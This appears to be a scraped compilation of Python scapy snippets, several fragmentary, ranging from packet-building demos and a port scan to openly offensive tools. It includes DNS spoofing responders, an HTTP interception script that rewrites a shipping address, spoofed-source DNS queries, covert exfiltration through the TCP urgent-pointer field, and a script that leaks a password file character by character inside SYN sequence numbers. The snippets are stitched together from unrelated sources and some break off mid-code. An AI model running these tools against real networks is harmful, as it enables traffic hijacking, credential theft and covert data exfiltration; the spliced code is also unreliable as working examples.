示例#1
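def print_and_accept(pkt):
    """Accept a queued packet, then inspect it for a cleartext shipping request.

    ``pkt`` is a queue item exposing ``accept()`` and ``get_payload()``.  The
    verdict is issued first, so nothing done below changes the packet that was
    forwarded; the edited JSON is submitted as a separate HTTP POST.
    """
    regex = re.compile("/ex3/shipping")
    pkt.accept()

    ip = IP(pkt.get_payload())

    # Indexing a layer that is not present raises, so check for both layers
    # first; otherwise any non-TCP packet would abort the callback.
    if not (ip.haslayer("TCP") and ip.haslayer("Raw")):
        return
    if ip["TCP"].dport != 80:
        return

    # The body is readable only because it travels as plain HTTP on port 80;
    # under TLS the Raw layer would hold ciphertext.
    try:
        http = ip["Raw"].load.decode()
    except UnicodeDecodeError:
        return  # binary payload, not a text request
    if not regex.search(http):
        return

    print("HTTP:")
    print(http)
    print("\nIP.show():")
    ip.show()  # show() prints the dissection itself and returns None

    # The JSON document is expected on the last line of the request; a
    # segment carrying only headers fails to parse and is skipped.
    try:
        new_msg = json.loads(http.splitlines()[-1])
    except ValueError:
        return
    if not isinstance(new_msg, dict):
        return
    new_msg["shipping_address"] = "*****@*****.**"
    body = json.dumps(new_msg)

    # Raw.load holds bytes, so store the serialised form, not the dict.
    ip["Raw"].load = body.encode()
    print("\nIP.show() nr. 2:")
    ip.show()

    # Bound the wait so a silent server cannot stall the queue callback.
    answer = requests.post(
        "http://com402.epfl.ch/hw1/ex3/shipping",
        data=body,
        headers={"Content-Type": "application/json"},
        timeout=10,
    )
    print("\nAnswer code:")
    print(answer.status_code)
    print("\nAnswer text:")
    print(answer.text)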
 def send_data(self, bytestream):
     """Send one TCP segment whose urgent-pointer field carries ``bytestream``.

     The field value comes from ``self.int_for(bytestream)``; the destination
     and ports come from ``self.host()``, ``self.dest_port()`` and
     ``self.source_port()``.  A SYN that also sets URG with a non-zero urgent
     pointer is unusual in ordinary traffic, which makes this flag/field
     combination a usable detection signature.
     """
     if self.verbose():
         print("Exfiltrating %r" % (bytestream.decode('us-ascii'),))
     ip_hdr = IP(dst=self.host())
     tcp_hdr = TCP(
         dport=self.dest_port(),
         sport=self.source_port(),
         # 0x20 is URG and 0x02 is SYN; both bits are set together.
         flags=0x20 | 0x02,
         urgptr=self.int_for(bytestream),
     )
     packet = ip_hdr / tcp_hdr
     if self.verbose():
         packet.show()
     send(packet, verbose=self.verbose())
示例#3
 def get_response(pkt: IP):
     """Reply to a DNS query naming ``page_name`` with records for ``FAKE_IP``.

     Returns a status string when a reply was sent and ``None`` otherwise.
     The reply copies the query's transaction id and UDP source port, the
     values a client uses to pair an answer with its question.
     """
     print("XD")
     is_plain_query = (DNS in pkt and pkt[DNS].opcode == 0
                       and pkt[DNS].ancount == 0)
     if not is_plain_query:
         return None
     print("XD")
     if page_name not in str(pkt["DNS Question Record"].qname):
         return None

     ip_part = IP(dst=pkt[IP].src)
     udp_part = UDP(dport=pkt[UDP].sport, sport=53)
     records = (DNSRR(rrname=pkt[DNSQR].qname, rdata=FAKE_IP) /
                DNSRR(rrname=page_name, rdata=FAKE_IP))
     dns_part = DNS(id=pkt[DNS].id, ancount=1, an=records)
     spf_resp = ip_part / udp_part / dns_part

     spf_resp.show()
     send(spf_resp, verbose=0, iface=IFACE)
     return f"Spoofed DNS Response Sent: {pkt[IP].src}"
示例#4
 def modify(packet):
     """Queue callback: answer queries for ``facebook.com.`` locally, pass the rest.

     ``self`` and ``ip`` are free variables taken from the enclosing scope.
     A matching query is dropped from the queue and a separately built reply
     frame is sent; every other packet is accepted unchanged.
     """
     pkt = IP(packet.get_payload())
     # NOTE(review): a payload without a DNS question appears to raise on the
     # attribute lookup below, leaving the queued packet without a verdict -
     # confirm how the caller handles that.
     if pkt.qd.qname != b'facebook.com.':
         packet.accept()
         return

     print(pkt.show())
     ether_hdr = Ether(dst=self.MacList[0], src=self.LocalMac,
                       type=0x0800)  # 0x0800 == 2048, the IPv4 EtherType
     ip_hdr = IP(src=pkt[IP].dst, dst=pkt[IP].src)
     udp_hdr = UDP(sport=53, dport=pkt[UDP].sport)
     question = DNSQR(qname=pkt[DNS].qd.qname, qtype=1, qclass=1)
     answer = DNSRR(rrname=pkt[DNS].qd.qname, type=1, rclass=1, rdata=ip)
     dns_msg = DNS(
         id=pkt[DNS].id,
         qr=1,
         qdcount=1,
         ancount=1,
         nscount=0,
         arcount=0,
         qd=question,
         an=answer,
         ns=None,
         ar=None,
     )
     p = ether_hdr / ip_hdr / udp_hdr / dns_msg
     sendp(p, verbose=0)
     # The queued query itself is discarded, not rewritten in place.
     packet.drop()
示例#5
    def get_response(pkt: IP):
        """Answer queries for listed sites with 127.0.0.1, forward the others.

        Returns a status string when a loopback answer was sent, the result
        of ``forward_dns(pkt)`` for any other DNS query, and ``None`` for a
        packet that is not a standard DNS query.
        """
        is_query = (DNS in pkt and pkt[DNS].opcode == 0
                    and pkt[DNS].ancount == 0)
        if not is_query:
            return None

        # Substring match of each listed site against the queried name.
        site_in_list = any(
            site in str(pkt["DNS Question Record"].qname)
            for site in website_list
        )
        if not site_in_list:
            # Not on the list: hand the query to the real resolver path.
            return forward_dns(pkt)

        # Build the loopback answer for the listed name.
        loopback_answer = DNSRR(
            rrname=pkt[DNSQR].qname, ttl=299, rdata='127.0.0.1')
        spf_resp = (IP(src=DNS_SERVER_IP, dst=pkt[IP].src) / UDP() /
                    DNS(an=loopback_answer))

        # Banner output for demonstration runs.
        print("******************** SITE IN BANNED LIST *****************")
        print("****************** SPOOFED PACKET BELOW ******************")
        spf_resp.show()

        send(spf_resp, verbose=2, iface=IFACE)
        return f"Spoofed DNS Response Sent: {pkt[IP].src}"
示例#6
    def send(self, packet):
        """Wrap ``packet`` in IP/UDP, fragment it and write the fragments to the socket.

        Each fragment goes out as a 4-byte big-endian length followed by the
        fragment bytes.  The socket is created on demand through
        ``self.create()`` and, when ``self.raw_send`` is set, closed again
        after every fragment.  Packet contents are hexdumped on every call
        and handed to ``self.log.packet`` when a log object is configured.
        """
        ip_hdr = IP(dst=self.target_ip, src=self.return_ip)
        udp_hdr = UDP(dport=self.target_port, sport=self.return_port)
        original_packet = ip_hdr / udp_hdr / packet
        if self.verbose > 1:
            print "Original packet:"
            original_packet.show()
        hexdump(str(original_packet))

        fragments = fragment(original_packet, fragsize=self.fragment_size)
        total = len(fragments)
        try:
            for i, frag in enumerate(fragments, 1):
                if self.verbose > 1:
                    print "Fragment %d of %d:" % (i, total)
                    frag.show()
                wire = str(frag)
                # Length prefix: unsigned 32-bit, network byte order.
                length = struct.pack(">I", len(wire))

                if not self.sock:
                    print '[+] connecting ...'
                    self.sock = self.create()

                print '[+] sending part %d of %d now..' % (i, total)
                hexdump(wire)
                if self.log:
                    self.log.packet('sending fragment %d of %d' % (i, total), wire)
                self.sock.send(length)
                self.sock.send(wire)
                if self.log:
                    self.log('sent fragment %d of %d' % (i, total))

                if self.raw_send:
                    if self.log:
                        self.log('forcing a new connection due to raw_send flag')
                    self.close()

        except KeyboardInterrupt as e:
            print "[-] keyboard interrupt while connecting/sending to redirector"
            raise KeyboardInterrupt, e
示例#7
    def get_response(pkt):
        """Answer queries for trailers.apple.com with ``DNS_SERVER_IP``, forward the rest.

        Only standard queries that did not originate from ``DNS_SERVER_IP``
        are handled; anything else returns ``None``.  The reply reuses the
        query's transaction id and UDP source port.
        """
        is_client_query = (DNS in pkt and pkt[IP].src != DNS_SERVER_IP
                           and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0)
        if not is_client_query:
            return None

        if 'trailers.apple.com' not in str(pkt['DNS Question Record'].qname):
            return forward_dns(pkt)

        ip_part = IP(dst=pkt[IP].src)
        udp_part = UDP(dport=pkt[UDP].sport, sport=53)
        dns_part = DNS(
            id=pkt[DNS].id,
            ancount=1,
            an=DNSRR(rrname=pkt[DNSQR].qname, rdata=DNS_SERVER_IP),
        )
        spoofed = ip_part / udp_part / dns_part
        print(spoofed.show())
        send(spoofed, verbose=0)
        return f'Spoofed DNS Response Sent: {spoofed.summary()}'
示例#8
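class IPLayer(object):
    """Small builder around a scapy ``IP`` packet.

    ``arguments`` is a dict mapping attribute names to values.  Names the
    packet has no attribute for are skipped silently.
    """

    def __init__(self, arguments=None):
        """Store the field dict; the packet itself is created by ``make()``.

        Raises:
            TypeError: if ``arguments`` is given and is not a dict.
        """
        self.packet = None
        # A fresh dict per instance: a shared ``{}`` default would be stored
        # on every instance and leak values between them.
        if arguments is None:
            arguments = {}
        if not isinstance(arguments, dict):
            # Returning a string from __init__ makes Python raise TypeError
            # anyway; raise it explicitly with the intended message.
            raise TypeError("Please provide a dictionay")
        self.arguments = arguments

    def _apply(self, arguments):
        """Copy every entry of ``arguments`` the packet has an attribute for."""
        # NOTE(review): hasattr() is also true for methods and other
        # non-field attributes, so a key such as "show" would be assigned
        # onto the packet - confirm callers only pass header field names.
        for param in arguments:
            if not hasattr(self.packet, param):
                continue
            setattr(self.packet, param, arguments[param])

    def make(self):
        """Create a new ``IP`` packet from the stored arguments; returns self."""
        self.packet = IP()
        self._apply(self.arguments)
        return self

    def updatePacket(self, arguments=None):
        """Apply further field values to the existing packet.

        Returns the message string when ``arguments`` is not a dict,
        otherwise ``None``.
        """
        if arguments is None:
            arguments = {}
        if not isinstance(arguments, dict):
            return "Please provide a dictionay"
        self._apply(arguments)

    def getPacket(self):
        """Return the current packet, or ``None`` before ``make()``."""
        return self.packet

    def show(self):
        """Print the packet through its own ``show()`` and return its result."""
        return self.packet.show()

    def addTCP(self):
        """Append a TCP layer obtained from ``TCPLayer``; returns self."""
        packet = TCPLayer()._getTCP()
        self.packet = self.packet / packet
        return self

    def prependEther(self):
        """Put an Ethernet layer from ``EtherLayer`` in front; returns self."""
        packet = EtherLayer()._getEther()
        self.packet = packet / self.packet
        return self

    @staticmethod
    def _getIP():
        """Return a default ``IP`` packet.

        Declared static because the function takes no ``self``; without the
        decorator a call on an instance fails with a TypeError.
        """
        return IP()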
示例#9
import os, sys, struct
from select import select
from scapy.all import IP
from fcntl  import ioctl



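# Read frames from the tap device and print scapy's dissection of each one.
f = os.open("/dev/tap0", os.O_RDWR)
try:
    while 1:
        # Block until the descriptor is readable; it is the only one watched.
        r = select([f], [], [])[0][0]
        if r == f:
            packet = os.read(f, 4000)
            # NOTE(review): a tap interface normally delivers Ethernet
            # frames, while IP() dissects from the first byte - confirm the
            # link header is not present in what is read here.
            ip = IP(packet)
            ip.show()
except KeyboardInterrupt:
    print("Stopped by user.")
finally:
    # Release the device descriptor on every exit path.
    os.close(f)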
示例#10
#!/usr/bin/python3
# Scapy is a python library that allows us to design, manipulate, intercept and process packets
# Scapy sets header fields by default.
# Have to be root to run this.

from scapy.all import IP, ICMP, sr1, ls

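ip_layer = IP(src="192.168.0.1", dst="www.google.com")

icmp_req = ICMP()

# ls() and show() print their own output and return None, so they are called
# directly; wrapping them in print() only adds a stray "None" line.
ls(ip_layer)
ip_layer.show()
print(ip_layer.summary())

icmp_req.show()
# Add the layers together with /
packet = ip_layer / icmp_req

# sr1() returns the first answer.  The reply is addressed to the src set
# above, so it only arrives here when that address belongs to this host;
# without a timeout the call would wait indefinitely in the other case.
received_packet = sr1(packet, timeout=5)

if received_packet:
    received_packet.show()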
示例#11
# The IP source is whatever was entered, so the answer to this query is
# delivered to that address.  Networks that validate source addresses at
# egress discard packets whose source is not their own.
i.src = source_input
u = UDP(dport=53)
d = DNS(rd=1,qd=DNSQR(qname=query_input))

# Summary of the values entered.
print ""
print "Information"
print "==========="
print "Source IP     : %s" %source_input
print "Destination IP: %s" %destination_input
print "DNS Query     : %s" %query_input
print ""
print "Package details"
print "==============="
print ""
# Each layer is dumped in turn, followed by an empty line.
for layer in (i, u, d):
    print layer.show()
    print ""

# Ask before anything is transmitted; an empty answer counts as yes.
is_ok = raw_input("Is it OK? (Y/n)")

if is_ok not in ("y", "Y", ""):
    print "Bye."
else:
    p = send(i/u/d)
# Raise the threshold of the "scapy.runtime" logger before scapy is imported
# on the following line.  49 sits just below logging.CRITICAL (50), so only
# CRITICAL records from that logger get through.
l = logging.getLogger("scapy.runtime")
l.setLevel(49)
from scapy.all import send, IP, TCP, ICMP, UDP

# Build one packet per spreadsheet row.  Source, destination and ports are
# taken from the cells as they are, with no validation.
wb = load_workbook(filename=os.getcwd() + "/sample.xlsx")
# The sheet named 'Test' is used rather than the active one.
sheet = wb['Test']
for row in sheet.rows:
    protocol = row[0].value
    if protocol not in ('ICMP', 'TCP', 'UDP'):
        continue

    ip_hdr = IP(src=row[1].value,
                dst=row[2].value,
                proto=protocolNumber(row[0].value))
    sport, dport = row[3].value, row[4].value

    if protocol == 'ICMP':
        # The ICMP row stacks a TCP layer on top of the ICMP header.
        a = ip_hdr / ICMP() / TCP(sport=sport, dport=dport) / "Hello World"
    elif protocol == 'TCP':
        a = ip_hdr / TCP(
            sport=sport, dport=dport, flags='S', seq=42) / "Hello World"
    else:
        a = ip_hdr / UDP(sport=sport, dport=dport) / "Hello World"

    a.show()
    # In the code shown, the UDP row is displayed only; no send() follows it.
    if protocol != 'UDP':
        send(a)
示例#13
import select
import time
from scapy.all import IP, ICMP
from pytun import TunTapDevice, IFF_TAP, IFF_TUN, IFF_NO_PI

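# Virtual TUN interface that answers pings itself.  desire_time and
# desire_ttl are not defined in the code shown; they must exist before the
# loop runs.
tun = TunTapDevice(flags=IFF_TUN | IFF_NO_PI, name="FakePing")
tun.addr = "10.10.10.1"
tun.netmask = '255.255.255.0'
tun.up()

epoll = select.epoll()
epoll.register(tun.fileno(), select.EPOLLIN)

try:
    while True:
        # Drain everything that is currently readable without blocking.
        while epoll.poll(0):
            data = tun.read(tun.mtu)
            packet = IP(data)

            icmp_part = packet.getlayer(ICMP)
            # Answer echo requests (type 8) only.  Replying to every ICMP
            # message would also send echo replies in response to error
            # messages and to other echo replies.
            if icmp_part is not None and icmp_part.type == 8:
                time.sleep(desire_time)
                respacket = IP(src=packet.dst, dst=packet.src, ttl=desire_ttl)
                respacket /= ICMP(type=0, seq=icmp_part.seq, id=icmp_part.id)
                respacket /= icmp_part.payload
                tun.write(bytes(respacket))

                packet.show()
                respacket.show()

        time.sleep(0.01)
finally:
    # Release the poller and the interface on every exit path, including
    # Ctrl-C.
    epoll.close()
    tun.close()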
示例#14
# TCP SYN probe of five ports from a randomised source port; the result of
# sr() (answered and unanswered packets) is kept in p.
p=sr(IP(src="192.168.43.55", dst="www.secdev.org")/TCP(sport=RandShort(),dport=[20,21,80,443,3389], flags="S"),inter=0.5,retry=2,timeout=1)
#traceroute
traceroute(["www.google.com"], maxttl=20)
# traceroute to port 23
traceroute (["10.1.99.2"],dport=23,maxttl=20)
# packets built layer by layer (each expression only constructs a packet)
IP()
IP()/TCP()
Ether()/IP()/TCP()
IP()/TCP()/"GET / HTTP/1.1\r\n\r\n"
Ether()/IP(dst="api.tidex.com")/TCP(dport=443)/"GET /api/3/ticker/eth_btc HTTP/1.1\r\nHost: api.tidex.com\r\nConnection: close\r\n\r\n"
Ether()/IP()/IP()/UDP()

# assembling a packet from separately created layers
a=Ether(); a.show()
b=IP(); b.show()
c=TCP(); c.show()
# NOTE(review): sr() sends at layer 3; a packet that starts with Ether() is
# normally sent with srp() - confirm which one is intended here.
d=sr(a/b/c,timeout=2)

# sending a layered packet
# NOTE(review): the request text is sent in clear to port 443 with no TLS
# handshake - confirm this is only meant to show layering.
ans,unans=sr(IP(dst="api.tidex.com")/TCP(sport=RandShort(),dport=443)/"GET /api/3/ticker/eth_btc HTTP/1.1\r\nHost: api.tidex.com\r\nConnection: close\r\n\r\n")

#############HTTP
## very important
#https://stackoverflow.com/questions/9058052/unwanted-rst-tcp-packet-with-scapy
# The host's own TCP stack has no record of a connection opened from scapy, so
# it answers the peer's reply with a RST; the rule below drops those outgoing
# RSTs from the given source address.
#iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 192.168.43.55 -j DROP
load_layer("http")
req = HTTP()/HTTPRequest(
    Accept_Encoding=b'gzip, deflate',
    Cache_Control=b'no-cache',
    Connection=b'keep-alive',
示例#15
#! /usr/bin/env python

from scapy.all import TCP, IP, send
import time

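src_naame = '10.0.2.15'  # IP of the listener, used as the packets' source address
src_port = 666  # port the listener is listening on, used as the TCP source port

i = 0
sn = 70

webs = ['twitter.com', 'google.com', 'reddit.com']

# One SYN per character of the file: the sequence number is
# sn * 1000 + ord(c), with sn counting up from 70 to order the segments.
# On the wire this appears as SYNs from fixed source port 666 to port 443
# carrying low, steadily increasing sequence numbers, each followed half a
# second later by a bare FIN; ordinary stacks choose unpredictable initial
# sequence numbers, so the pattern stands out in flow or packet logs.
#
# The file is opened in a with-block so the handle is closed on every exit
# path, and it is read line by line instead of being loaded whole.
with open("/home/MadMaxx/Desktop/psswd.txt", 'r') as f:
    for line in f:
        for c in line:
            serv = webs[i]
            ip = IP(dst=serv, src=src_naame)
            p = sn * 1000 + ord(c)
            tcp = TCP(sport=src_port, dport=443, flags='S', seq=p)
            send(ip / tcp)
            ip.show()
            tcp.show()
            time.sleep(0.5)
            send(ip / TCP(dport=443, flags='F'))
            sn += 1
            # Rotate through the destination list.
            i = (i + 1) % len(webs)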